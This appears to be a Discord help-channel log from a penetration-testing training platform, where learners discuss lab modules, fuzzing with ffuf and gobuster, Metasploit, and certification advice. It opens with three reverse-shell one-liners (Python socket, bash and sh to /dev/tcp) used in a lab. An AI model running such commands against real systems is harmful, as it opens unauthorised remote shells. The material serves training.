  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • bash -i >& /dev/tcp/IP/PORT 0>&1
  • sh -i >& /dev/tcp/IP/PORT 0>&1

IP & PORT were replaced by my IP & listening port.

It is blocked in some ways directly in the box or ? The authenticated RCE module from metasploit is also not working.

tranquil axle
#

Sometimes β€œbash” is not enough and you need to provide β€œ/bin/bash” instead

cerulean hinge
#

even with /bin/bash or /bin/sh it didn't worked

cerulean hinge
#

I used all bash related scripts and nothing worked 😦

tranquil axle
#

Or worst case download socat onto the machine and use that to establish a shell

cerulean hinge
proper mountain
#

hello πŸ₯² ... Can anyone help me with the custom wordlists skill assessment (login bruteforcing)... There was nothing specific given in the question so I went with the creds given in the module itself, but it's taking forever.

fathom pendant
fathom pendant
#

As noted by the custom wordlist section, which I'm assuming you're on

haughty karma
#

has anyone done the prolab zephyr and did your fping come up with more than one ip. Already stuck i feel dumb

wooden seal
#

Which version of Metasploit comes equipped with a GUI interface? (do i have to answer in version no. or the edition stuff) i am confused

wooden seal
#

got it thanks

wooden seal
#

i wasted way too much time for this answer omg

fathom pendant
#

Just a light jab lol

#

It's a common sentiment for many modules

wooden seal
#

nah man i tried every edition it was wrong due to space or some thing i was like wth????

fathom pendant
#

Version != edition

#

Edition is like enterprise/professional/public

#

I believe it's also stated in that section kek_flare

proper mountain
fathom pendant
cedar ocean
proper mountain
storm elk
cloud urchin
#

it's intro to windows evasion techniques skill assessment 1

storm elk
#

Didn’t do that one yet

grand portal
#

could anyone please help me with medium lab in attacking common services?

proper mountain
hasty mauve
#

where can I find the password for the zip file in Documentation & Reporting?
and why is it even protected with a password lol

cloud urchin
#

pretty sure it's in the module

hasty mauve
tranquil axle
cloud urchin
#

it's on the intro page

hasty mauve
cedar ocean
untold lynx
#

Hello

#

Can i bypass frp withought droid kit

novel matrix
cedar ocean
#

Skills Assessment II Introduction to Windows Evasion Techniques also encountered the same situation

analog cedar
#

User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them

#

Friends, he has more than a thousand flag.txt files, how can I filter out the ones with content?

acoustic owl
analog cedar
#

I used find to query the flag file and found more than a thousand flags. I don’t know how to determine which file is correct. I won’t post pictures, sorry.

plush hazel
#

Yo

coarse python
#

Yooooo@plush hazel

analog cedar
crimson plinth
#

Hi brother, did you find the answer and can u give me hint? plz

stark geyser
#

Module: Intro to C2 Operations with Sliver
Section: Skills Assessment

For the last question, I have tried both the Abuse KRBTGT attack and the TrustKey attack but for both of them, when I try to access the 2nd domain I get a "Access Denied" followed by a "Does not exist" error. Any advice?

midnight verge
#

CROSS-SITE SCRIPTING(XSS) -Phising. Could someone tell me what I'm doing wrong ? for some reasons

#

I can't listen to the port 80 ?

autumn pilot
#

Choose a different port

midnight verge
#

?

#

I'm waiting for a connection from http

#

what other port could I use ?

safe star
#

Anything else

#

The pwnbox is running on port 80 already

old wasp
midnight verge
midnight verge
midnight verge
midnight verge
toxic apex
analog cedar
#

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

#

what should i do

opal nexus
analog cedar
ripe wadi
#

Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb" on the inf gathering web edition i have performed the following scan gobuster vhost -u http://inlanefreight.htb:58757 -w ~/Desktop/wordlists/subdirectories-discover/top1mparams.txt -t 100 --append-domain but i only see some of the vhosts that ar being asked for ````
Found: admin.inlanefreight.htb:58757 Status: 200 [Size: 100]
Found: blog.inlanefreight.htb:58757 Status: 200 [Size: 98]
Found: forum.inlanefreight.htb:58757 Status: 200 [Size: 100]
Found: support.inlanefreight.htb:58757 Status: 200 [Size: 104]
Found: browse.inlanefreight.htb:58757 Status: 200 [Size: 102]
Found: Blog.inlanefreight.htb:58757 Status: 200 [Size: 98]
Found: Admin.inlanefreight.htb:58757 Status: 200 [Size: 100]

#

am i missing something from the course material on how to enum them

marble minnow
#

Hey guys! I'm new to htb and as a teenager I don't know from where to start.. I started with the information security foundation path and am halfway into the path.. I have been astonished by ethical hacking when I was young but still don't know my passion lol.. I know basic things nothing else really.. along with htb I'm also taking a 5 hr ethical hacking crash course available on yt and am also looking into learning python

ripe wadi
#

are there any specific ones or ?

compact matrix
#

look through seclist

old wasp
ripe wadi
#

i have used it

hasty mauve
marble minnow
#

Thank you so much,appreciate it!

#

I thought people were ignoring me since I was dumb? Lol

hasty mauve
old wasp
marble minnow
#

I did till learning progress of the information security foundation path

hasty mauve
marble minnow
waxen totem
marble minnow
#

Sorry,guess I have to go to general

analog cedar
#

help
I can't find the flag. Can anyone give me some hints?

#

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

ripe wadi
#

nvm my grep was falsely done i found them

ripe wadi
#

in my opinion

old wasp
ripe wadi
#

just not the best

old wasp
marble minnow
#

Guys I'm having a problem...

#

While entering general,discord asks me if I'm done reading and takes me to modules.. even though I open it and go back to general,the same things pops up again

#

Sorry I'm asking this here

#

But I can't open generals

old wasp
marble minnow
#

How?

waxen totem
marble minnow
#

I opened welcome,and the same message pops up..

#

And Im redirected here

hasty mauve
marble minnow
#

Done reading? Check out # modules

#

""

#

Hello?

old wasp
#

read this part

marble minnow
#

Oh..

alpine pond
#

Hi guys, is there anyone who can access the skill assessment machine on the module (MSSQL, Exchange, and SCCM Attacks)?

I can't access the RDP since 3 hours ago, I think it's under maintenance or something?

marble minnow
#

Thanks btw

#

I can now use general

old wasp
#

spoiler and wrong channel (ask in boxes)

neat warren
#

Sorry, im new to the dc. Wont happen again!

ripe wadi
#

guys has anyone installed finalrecon recently

#

i cant seem, to get it running

#

and the worst is i tried following the docs for installingit using the git repo

#

and the .py file is not even there

surreal hedge
ripe wadi
#

how

#

and on what system

#

pls dont say arch

fathom pendant
#

I had no issues installing on parrot

twin shadow
#

anyone done this Attacking Wi-Fi Protected Setup - Skills Assessment?

ancient niche
#

Merry Christmas all

#

Someone can help me with this please? i can't find the flag 😦

fathom pendant
#

Help with what?

#

If you can't find the flag, skill issue /s

#

Might be best to just view the page itself instead of via burp, then ctrl+f for /root or typical root filesystem stuff

tranquil axle
fathom pendant
#

Also: quotes are* important

ancient niche
#

mmm

#

okayyy

twin shadow
#

hey @uneven dune Can you check dm?

fathom pendant
#

I suggest not dming people without asking (#rules)

ancient niche
#

thank you brother you saved my life πŸ™‚ @fathom pendant

fathom pendant
#

Which is why it's recommended to visit the page in a browser instead of via burp

#

So you're not having dozens of different things running the command

ancient niche
#

okay okay

#

thanks brother

hasty mauve
ancient niche
#

how can i unlock HTBP CPTS ?

fathom pendant
full timber
#

hello

fathom pendant
#

Either silver annual [comes with voucher and access to t2 and below modules] or one month plat, one month gold + voucher

fathom pendant
fathom pendant
#

It's tough but fair

ancient niche
#

exam sorry xD

fathom pendant
#

#cpts for discussions about it and such

fathom pendant
ancient niche
#

i would like work of this πŸ™‚ but i don't have knowledge

fathom pendant
#

But the exam doesn't deviate from techniques you learned

ancient niche
#

what do you recommend?

fathom pendant
#

Huh?

#

Silver annual is good if you want a walkthrough for when you get stuck, or as a reference to see if something could have been done differently

ancient niche
#

hahaa i' am alwats stuck ahha

#

always

fathom pendant
#

Then you aren't learning

#

Notes can help you get unstuck

#

Run into error? Note it down and what you did to resolve

proven loom
#

Yeah generally the solution is "use PwnBox" πŸ˜‚

ancient niche
#

do you recommend me to do a bootcamp?

shut vapor
#

Seasons Greetings all you far-too dedicated hackers... and regular greetings to those of you for whom this is just another day.

#

Command Injection's assessment was cool, but boy I felt like I was just smacking away at it for far too long until something worked. Is that largely what hacking is?

tranquil axle
#

So you want to be doing educated guesses eventually

fathom pendant
ancient niche
#

that is true

#

but i think that could i do bootcamp?

fathom pendant
#

?

shut vapor
fathom pendant
#

You don't really learn much because of how fast paced the environment tends to be

ancient niche
fathom pendant
#

And well priced

ancient niche
fathom pendant
#

Certs don't guarantee jobs, but they can give you a leverage of knowledge and skill

ancient niche
#

then? 😦

fathom pendant
#

Skills land jobs

#

Making yourself stand out

#

With tech layoffs, companies can find someone with a cert a dime a dozen, so you have to stand out more

ancient niche
#

you give me a lot of encouragement 😦 xD

fathom pendant
#

cybersecurity isn't necessarily an entry level thing, especially pentesting Β―_(ツ)_/Β―

#

Entry level pentesting is like mid-level IT

ancient niche
#

oh my good

fathom pendant
#

@plush venture also include the module name and section you're on

plush venture
#

ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:50801/ -H 'Host: FUZZ.academy.htb' -fs 900 -v
module: attacking web application ffuf
section: filtering results

fathom pendant
#

Try a bigger wordlist

languid geyser
#

What type of analysis can be used to predict future probabilities? Help please

plush venture
fathom pendant
fathom pendant
languid geyser
#

Penetration Testing Process

fathom pendant
plush venture
fathom pendant
plush venture
fathom pendant
plush venture
#

okay

fathom pendant
#

Do you have academy.htb in your hosts file?

plush venture
fathom pendant
#

And is it ip academy.htb [note you don't put the port]

plush venture
#

i forgot....

plush venture
#

πŸ˜‚

plush venture
plush venture
#

oh, i thought it was intended for smth else

fathom pendant
#

Who else would I be talking to. Besides a wall

plush venture
#

though it wasn't working

#

but why not?

fathom pendant
plush venture
fathom pendant
#

In your http request you use the port

plush venture
#

but it was still the same

#

ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:50801/ -fs 900 -v

fathom pendant
#

You still use the host header

#

Also are you sure 900 is the right filter size

plush venture
#

it wasnt working if i replaced the academy.htb with ip too and why do i need header?

ancient niche
fathom pendant
plush venture
fathom pendant
#

You need to use -H "HOST: FUZZ.academy.htb"

#

The host header doesn't use port

fathom pendant
# plush venture okay...

If it was a public website a dns server would handle the http://FUZZ.Example.com requests, but since these targets use vhosts you'll need to use host headers, as host header tells the server that you want to request a specific resource on it

#

Vhosts sit within the webroot of a server

storm elk
#

Not all vhosts are exposed via dns irl either

fathom pendant
#

/var/www/html/<vhost>/ and whatever web service is configured to handle those requests and pull the right resources

storm elk
#

For my clients, the test environments are not in their dns but just in vhosts

plush venture
#

arent vhosts just subdomains but not present in public dns servers?

#

@fathom pendant

storm elk
#

It can be a domain too. Or IP based

#

Theoretically

plush venture
#

huh?

fathom pendant
#

Vhosts can be publicly routed

storm elk
#

Ooops. Sorry I meant to delete my message

plush venture
#

nah it alright

storm elk
#

β€œhow so? isn't it necessary to have the ip of the domain in order to access the host under it?”

#

This was what you wrote

plush venture
#

yes

storm elk
#

You’ll need the IP of the server, yes. But you can put the (sub)domain in your hosts file and when sending a request, it will tell the (sub)domain you’re looking for in the headers. That’s why ffuf vhost enumeration works via the -H "Host: FUZZ.domain.tld”

plush venture
#

wdym by putting it in the hosts file?

storm elk
#

/etc/hosts contains entries to map certain IPs to a hostname

#

The computer file hosts is an operating system file that maps hostnames to IP addresses. It is a plain text file. Originally a file named HOSTS.TXT was manually maintained and made available via file sharing by Stanford Research Institute for the ARPANET membership, containing the hostnames and address of hosts as contributed for inclusion by me...

#

You could call it your personal DNS "phone" book

plush venture
#

oh i thought you were talking bout files in the server

fathom pendant
#

Your system checks your hosts file -> public dns

plush venture
#

i misread it

fathom pendant
#

If not in hosts it checks public dns servers to see if it's routed

plush venture
storm elk
#

That should work

#

Just don’t forget the header, the host needs to be sent. If you don’t send it, the server won’t know what vhost to serve

plush venture
#

wait whats the use of header in here?

storm elk
#

The header will contain the Host you are requesting

plush venture
#

oh

#

but isnt that automatically determined by the domain i provide in url?

#

shit nvm, i need to learn about web stuff a little more

fathom pendant
ancient niche
fathom pendant
#

As i said, they are mostly scams

#

Fast paced shit prep

ancient niche
#

ok ok thanks fried

#

friend

mental warren
#

Hey, I know that this is not the right place to post thi, but I need a little help with redeeming a gift card in the academy. When i try to redeem it it says that sth went wrong and that i should contact the support. I can't seem to find how to contact them on the site so i decided to post here. I think what my issue is but, for this i would also need help from support.

compact patrolBOT
mental warren
#

Appreciate

main coyote
#

Hi, i am stuck in the last assessment question of WPS module. Tried everything including generating list of keys and bruteforcing with bash script. Everything seems to fail. Any help will be appreciated

ancient niche
#

i'm going to dinner Merry Christmas all

storm elk
safe star
#

They tell you why

fathom pendant
#

Escaping tags

#

It's told in the section why

#

The HTB walkthroughs don't explain much of anything because they expect you to have read the material

plush venture
#

@dapper peak

#

if everything returns 200

#

among 1000s of output

fathom pendant
#

Like response size

plush venture
#

how do i find the one required parameter

plush venture
fathom pendant
#

It's not gonna be the same as the examples

fathom pendant
plush venture
#

yes

#

but there are 6000 results

#

everything has a size

fathom pendant
#

You don't need to review all the results

plush venture
#

-fs ?

fathom pendant
#

Yep

#

Look for the responses with the same size, those are the ones you filter out

plush venture
#

but what size will i give it 😭

#

oh wait

#

wtf

fathom pendant
#

The module teaches you how to figure it out

#

πŸ™ƒ

plush venture
#

i thought it gave the ones i needed 😭

#

now i know its filtering out 😭

#

ok now it makes sense

fathom pendant
plush venture
#

yes ill keep that in mind πŸ₯²

fathom pendant
#

The -f[X] options are options to filter out; the -m[X] options are to match

#

More often than not you're filtering out junk

cunning frigate
#

Can anyone help with the evasion module? I have no experience in csharp and windows api so I literally have no idea why it doesnt work

#

Im in Dynamic Section

plush venture
#

i cant think of any other possible way

#

i tried all the possible filters with all the existing file under this domain

safe star
#

Why are you using 500 threads??

dark hedge
#

ffuf does stand for Fuzz Faster U Fool

plush venture
safe star
#

Are you filtering the common occurrence?

plush venture
safe star
#

Are u sure that’s the right parameter?

plush venture
#

im doing a module on parameter fuzzing, so ig yes?

#

oh wait

#

you meant fs?